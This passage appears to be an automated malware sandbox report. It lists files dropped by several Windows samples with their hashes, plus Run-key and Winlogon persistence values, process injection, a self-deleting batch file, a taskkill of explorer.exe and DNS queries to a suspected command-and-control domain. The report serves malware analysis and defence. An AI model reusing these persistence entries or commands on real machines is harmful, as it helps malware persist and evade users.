memory/952-85-0x0000000000F30000-0x0000000000F38000-memory.dmp

memory/1672-88-0x0000000000CE0000-0x0000000000F61000-memory.dmp

memory/1672-87-0x0000000000CE0000-0x0000000000F61000-memory.dmp

memory/952-84-0x0000000000F30000-0x0000000000F38000-memory.dmp

C:\VAULT.KEY

MD5 b016dd85b94d4020c3b00c65e88da2e2
SHA1 5bd57cb6b76db8b9aa421d915c0fd08583e5e94f
SHA256 910274869f619ebe2d6146453d08b6861c7770a0316c961ea51a07dec83e2e89
SHA512 803d08df67fa3c67f81f586838a8389011896aebd12354fb4c0795f747bdcdb0876996939a7d31a5bc087d962efc48050784c58eaccedcdf09a612d0b17d209c

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VAULT.hta

MD5 ca834cc56015bce8e010e356c69dc9f5
SHA1 b55ea373d3f5d583c33803d80059db5ddccf7038
SHA256 1b5feb1b9bf79a857330fc891a65824953ad5d72ce38b4fb41755475775c65bd
SHA512 66c6370c538567286641e2ca3438d28572a78b4d2a15912f9d55cc65f9c7491d16e3f277c9f1385ee6773ef400e1a47e7abe5208aa4d7f75b8db5c816e6531a8

C:\VAULT.KEY

MD5 0a76640b1de589bfa790d454b95a3827
SHA1 6285d00315382fe81a9270dd3ea345a18bfbccc9
SHA256 bfb33881f161969d0d7982e6596016ad7ee3db61746bbb227ca9de5be8508ae4
SHA512 97d95835bc2828111a7671849f741763e8e857cc2ef130c39295f8e78e796ad0c24ad5d0ce80341e039b79ff83782f48f02e45ef03707131a0224fac36829b67

C:\VAULT.KEY

MD5 5dd572e3080fff1818b87382e6ead887
SHA1 dc758af74b6789700ec3fca49afe0397d5c53415
SHA256 3b1c1d9154a1e10e689e8119fe3444aab37c40d63d7dab4cd78c8b8198aa6270
SHA512 f5c96169fc54c283623e47da1ffc6b414b937f344022e46f68164ae4027be4ca857ff7585a88baea8ed534b3341f8b6ae829de4c3e4aa6e24de8f079ca6b5e43

C:\VAULT.KEY

MD5 bc42e4fdf1cf03c333764adbabab2a0e
SHA1 71cf5a46e1a5cc86d4abfb7f0259930126e13b7f
SHA256 61ec94418f4f7e48c211652bea4766fa279c0af0acb2b1970be0e3c06bd28d09
SHA512 3eaaa7aa484078d6b5c03d7ab2325d69c074a0b5e650cb75445add0a5778f145d118a61c9fd2ae6d4288e2eee25b9314427b164ad9dc7d92bf81a11dbdbc93a1

C:\VAULT.KEY

MD5 49449553a16c8632f7bee68abab535e5
SHA1 d1c7a97df0d9ad711304a60e0c302947ffdcf635
SHA256 2a254d1e455f463facc14f59fb0c1512e617304354bf7053c8e75db6581bb607
SHA512 3b012b8c93b57b34e702aee2d8002e0f5bc34d576cc409c57cd0244e72e7bb5e9013f8f6e0b793b318faed99020ff584af99661e0a00e1571aa40a4139fd94af

memory/576-180-0x0000000000260000-0x0000000000272000-memory.dmp

memory/576-184-0x0000000000F30000-0x0000000000F38000-memory.dmp

C:\VAULT.KEY

MD5 0bf3c28b0982a4ed6fc9222e6cb4281a
SHA1 d54d86e52ecebfcdee786e2b43ae6c75911f1369
SHA256 cd15cd3d3fe5435949c1d5040d553729dcfd7ecf99e1afd8f30a24ce11e4ab35
SHA512 f8f5aecb66dea9225f5e98d59b5103158502879c517725bdf720203a1027bf2bfcb508aada5d3c960871346ef4fdfc3323353f513227d006db371bf18f76bfb5

memory/576-196-0x00000000000D0000-0x00000000000FE000-memory.dmp

memory/2876-199-0x0000000000720000-0x00000000009A1000-memory.dmp

memory/2876-200-0x0000000000720000-0x00000000009A1000-memory.dmp

memory/1748-202-0x0000000000D50000-0x0000000000D58000-memory.dmp

memory/1748-203-0x00000000001F0000-0x000000000021E000-memory.dmp

memory/2792-207-0x0000000000720000-0x00000000009A1000-memory.dmp

memory/2792-206-0x0000000000720000-0x00000000009A1000-memory.dmp

C:\Windows\SysWOW64\Fontcore\Fontcore.lnk

MD5 af2d46d20855f6cea0a291a819778b20
SHA1 f022a7d64f820f269aaa31839d03b42d9930f9b6
SHA256 d1807a78e2b610bfa27cb194d80ef533504f162fe0e3b745bc5e6d5ba1889dc0
SHA512 35c531fd437f5fc8cfc1a8e3451e9187888acfe56b54fd11d3cfef49f5baee3784df8db6a343f9d3f57d517c4ae6c85dd78a8eac31d01e6b3b9ff9cc864a5aa4

memory/1748-228-0x0000000000D50000-0x0000000000D58000-memory.dmp

Analysis: behavioral26

Detonation Overview

Submitted

2024-11-22 03:25

Reported

2024-11-22 14:20

Platform

win7-20240729-en

Max time kernel

363s

Max time network

364s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\f002618c01fe652f7f00eabd0e890e4992ccce818dfb2863e82c43f793685635.apk

Signatures

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\f002618c01fe652f7f00eabd0e890e4992ccce818dfb2863e82c43f793685635.apk

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\f002618c01fe652f7f00eabd0e890e4992ccce818dfb2863e82c43f793685635.apk

C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe

"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\f002618c01fe652f7f00eabd0e890e4992ccce818dfb2863e82c43f793685635.apk"

Network

N/A

Files

C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents

MD5 22d1c62500e9c4818901195acf82136c
SHA1 b67b404c691517df7d7ec2e3b74298d548ae358f
SHA256 d38b7a0bb68d724f80af4aefc40341535c047f42cce1e75d765d43a8ba003df3
SHA512 aa28c24214fda661e4a4a068eee1b8a9370e2ef23eaad7db1abdabe6445f71a00e912957d48985813aa49d4e5ef44005a06aa47aea842cdfde9936fac9140578

Analysis: behavioral29

Detonation Overview

Submitted

2024-11-22 03:25

Reported

2024-11-22 14:24

Platform

win7-20241010-en

Max time kernel

600s

Max time network

366s

Command Line

"C:\Users\Admin\AppData\Local\Temp\f31bfe95e31d761459b885052d35ba5e25ab19333378fb72b12efd675f6018d7_.exe"

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Security = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\delta.exe" C:\Users\Admin\AppData\Local\Temp\f31bfe95e31d761459b885052d35ba5e25ab19333378fb72b12efd675f6018d7_.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\f31bfe95e31d761459b885052d35ba5e25ab19333378fb72b12efd675f6018d7_.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main C:\Users\Admin\AppData\Local\Temp\f31bfe95e31d761459b885052d35ba5e25ab19333378fb72b12efd675f6018d7_.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\f31bfe95e31d761459b885052d35ba5e25ab19333378fb72b12efd675f6018d7_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\f31bfe95e31d761459b885052d35ba5e25ab19333378fb72b12efd675f6018d7_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\f31bfe95e31d761459b885052d35ba5e25ab19333378fb72b12efd675f6018d7_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\f31bfe95e31d761459b885052d35ba5e25ab19333378fb72b12efd675f6018d7_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\f31bfe95e31d761459b885052d35ba5e25ab19333378fb72b12efd675f6018d7_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\f31bfe95e31d761459b885052d35ba5e25ab19333378fb72b12efd675f6018d7_.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2900 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\f31bfe95e31d761459b885052d35ba5e25ab19333378fb72b12efd675f6018d7_.exe C:\Users\Admin\AppData\Local\Microsoft\pacman.exe
PID 2900 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\f31bfe95e31d761459b885052d35ba5e25ab19333378fb72b12efd675f6018d7_.exe C:\Users\Admin\AppData\Local\Microsoft\pacman.exe
PID 2900 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\f31bfe95e31d761459b885052d35ba5e25ab19333378fb72b12efd675f6018d7_.exe C:\Users\Admin\AppData\Local\Microsoft\pacman.exe
PID 2900 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\f31bfe95e31d761459b885052d35ba5e25ab19333378fb72b12efd675f6018d7_.exe C:\Users\Admin\AppData\Local\Microsoft\pacman.exe
PID 2900 wrote to memory of 3012 N/A C:\Users\Admin\AppData\Local\Temp\f31bfe95e31d761459b885052d35ba5e25ab19333378fb72b12efd675f6018d7_.exe C:\Windows\SysWOW64\taskkill.exe
PID 2900 wrote to memory of 3012 N/A C:\Users\Admin\AppData\Local\Temp\f31bfe95e31d761459b885052d35ba5e25ab19333378fb72b12efd675f6018d7_.exe C:\Windows\SysWOW64\taskkill.exe
PID 2900 wrote to memory of 3012 N/A C:\Users\Admin\AppData\Local\Temp\f31bfe95e31d761459b885052d35ba5e25ab19333378fb72b12efd675f6018d7_.exe C:\Windows\SysWOW64\taskkill.exe
PID 2900 wrote to memory of 3012 N/A C:\Users\Admin\AppData\Local\Temp\f31bfe95e31d761459b885052d35ba5e25ab19333378fb72b12efd675f6018d7_.exe C:\Windows\SysWOW64\taskkill.exe

Processes

C:\Users\Admin\AppData\Local\Temp\f31bfe95e31d761459b885052d35ba5e25ab19333378fb72b12efd675f6018d7_.exe

"C:\Users\Admin\AppData\Local\Temp\f31bfe95e31d761459b885052d35ba5e25ab19333378fb72b12efd675f6018d7_.exe"

C:\Users\Admin\AppData\Local\Microsoft\pacman.exe

C:\Users\Admin\AppData\Local\Microsoft\\pacman.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /IM explorer.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 myplacehome.comuv.com udp
US 8.8.8.8:53 myplacehome.comuv.com udp
US 8.8.8.8:53 myplacehome.comuv.com udp

Files

memory/2900-0-0x0000000074B2E000-0x0000000074B2F000-memory.dmp

memory/2900-1-0x0000000001330000-0x00000000013E2000-memory.dmp

memory/2900-2-0x0000000074B20000-0x000000007520E000-memory.dmp

memory/2900-3-0x0000000074B20000-0x000000007520E000-memory.dmp

\Users\Admin\AppData\Local\Microsoft\pacman.exe

MD5 6464e51a6ee9d8ee9fad33430c24ecab
SHA1 fdca62379b1d54d85746cbb228a0d981376ec2f5
SHA256 68931ef9cf810d5a69d8ebf33155db7845fffcc685b1ae9f0670803bb97228cc
SHA512 313dc913dd5b769954d8df68290a8b6b44a8a3f271aec9cb00b44fdcf78e6f1c50542fb755cec61ef5965406acea9cdfe5856fd5f64af6f0f05ff2cc84be0790

memory/2808-10-0x00000000000C0000-0x00000000000DC000-memory.dmp

memory/2808-11-0x0000000074B20000-0x000000007520E000-memory.dmp

memory/2808-14-0x0000000074B20000-0x000000007520E000-memory.dmp

memory/2900-15-0x0000000074B20000-0x000000007520E000-memory.dmp

memory/2900-57-0x0000000074B2E000-0x0000000074B2F000-memory.dmp

memory/2900-58-0x0000000074B20000-0x000000007520E000-memory.dmp

memory/2900-59-0x0000000074B20000-0x000000007520E000-memory.dmp

memory/2808-60-0x0000000074B20000-0x000000007520E000-memory.dmp

memory/2808-61-0x0000000074B20000-0x000000007520E000-memory.dmp

memory/2900-62-0x0000000074B20000-0x000000007520E000-memory.dmp

Analysis: behavioral18

Detonation Overview

Submitted

2024-11-22 03:25

Reported

2024-11-22 14:19

Platform

win7-20240903-en

Max time kernel

359s

Max time network

360s

Command Line

"C:\Users\Admin\AppData\Local\Temp\e77df2ce34949eb11290445a411a47fb927e8871e2580897581981d17730032d.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\e77df2ce34949eb11290445a411a47fb927e8871e2580897581981d17730032d.exe

"C:\Users\Admin\AppData\Local\Temp\e77df2ce34949eb11290445a411a47fb927e8871e2580897581981d17730032d.exe"

Network

N/A

Files

memory/2384-0-0x000007FEF5D93000-0x000007FEF5D94000-memory.dmp

memory/2384-1-0x0000000000AB0000-0x0000000000AE6000-memory.dmp

memory/2384-2-0x000007FEF5D93000-0x000007FEF5D94000-memory.dmp

Analysis: behavioral31

Detonation Overview

Submitted

2024-11-22 03:25

Reported

2024-11-22 14:30

Platform

win7-20240708-en

Max time kernel

360s

Max time network

361s

Command Line

"C:\Users\Admin\AppData\Local\Temp\f9151107655aaa6db995888a7cb69ada.exe"

Signatures

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Reads user/profile data of web browsers

spyware stealer

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\f9151107655aaa6db995888a7cb69ada.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\attrib.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\attrib.exe N/A

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\f9151107655aaa6db995888a7cb69ada.exe

"C:\Users\Admin\AppData\Local\Temp\f9151107655aaa6db995888a7cb69ada.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Mozilla\EXTENS~1\B0B9TM~1.BAT

C:\Windows\SysWOW64\attrib.exe

attrib -R -S -H "C:\Users\Admin\AppData\Local\Temp\f9151107655aaa6db995888a7cb69ada.exe"

C:\Windows\SysWOW64\attrib.exe

attrib -R -S -H "C:\Users\Admin\AppData\Roaming\Mozilla\Extensions\B0B9.tmp.bat"

Network

N/A

Files

memory/3032-0-0x0000000000230000-0x000000000028E000-memory.dmp

memory/3032-2-0x0000000000400000-0x000000000045D000-memory.dmp

memory/3032-4-0x0000000000400000-0x000000000045D000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\EXTENS~1\B0B9.tmp.bat

MD5 7f6463b850974235d535591d85ef050d
SHA1 3f878c55c2bc75d2904e2bc4c99ff741bc4f1adf
SHA256 67ec6630dce786263c06f309f44dcb7658c19c53df365db7ae48e33100028491
SHA512 690b95c127b07fd7e3c30440daf4f67b02a0632770f4229e47c1d633f2e2410d166b44795ef4a4582f7809c93139ed68debed21fda8e83db0168acc31ef4bafa

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-22 03:25

Reported

2024-11-22 14:06

Platform

win7-20240708-en

Max time kernel

600s

Max time network

360s

Command Line

C:\Windows\Explorer.EXE

Signatures

Modifies WinLogon for persistence

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\shell = "explorer.exe,C:\\Users\\Admin\\AppData\\Roaming\\msconfig.dat" C:\Windows\syswow64\svchost.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\DgH5SjZFleOYoBTyxcgMDlZF9brN1mDI.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2696 set thread context of 2532 N/A C:\Users\Admin\AppData\Local\Temp\DgH5SjZFleOYoBTyxcgMDlZF9brN1mDI.exe C:\Users\Admin\AppData\Local\Temp\DgH5SjZFleOYoBTyxcgMDlZF9brN1mDI.exe

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\DgH5SjZFleOYoBTyxcgMDlZF9brN1mDI.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\DgH5SjZFleOYoBTyxcgMDlZF9brN1mDI.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\svchost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\ctfmon.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\DgH5SjZFleOYoBTyxcgMDlZF9brN1mDI.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DgH5SjZFleOYoBTyxcgMDlZF9brN1mDI.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\DgH5SjZFleOYoBTyxcgMDlZF9brN1mDI.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DgH5SjZFleOYoBTyxcgMDlZF9brN1mDI.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\SysWOW64\ctfmon.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2696 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\DgH5SjZFleOYoBTyxcgMDlZF9brN1mDI.exe C:\Users\Admin\AppData\Local\Temp\DgH5SjZFleOYoBTyxcgMDlZF9brN1mDI.exe
PID 2696 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\DgH5SjZFleOYoBTyxcgMDlZF9brN1mDI.exe C:\Users\Admin\AppData\Local\Temp\DgH5SjZFleOYoBTyxcgMDlZF9brN1mDI.exe
PID 2696 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\DgH5SjZFleOYoBTyxcgMDlZF9brN1mDI.exe C:\Users\Admin\AppData\Local\Temp\DgH5SjZFleOYoBTyxcgMDlZF9brN1mDI.exe
PID 2696 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\DgH5SjZFleOYoBTyxcgMDlZF9brN1mDI.exe C:\Users\Admin\AppData\Local\Temp\DgH5SjZFleOYoBTyxcgMDlZF9brN1mDI.exe
PID 2696 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\DgH5SjZFleOYoBTyxcgMDlZF9brN1mDI.exe C:\Users\Admin\AppData\Local\Temp\DgH5SjZFleOYoBTyxcgMDlZF9brN1mDI.exe
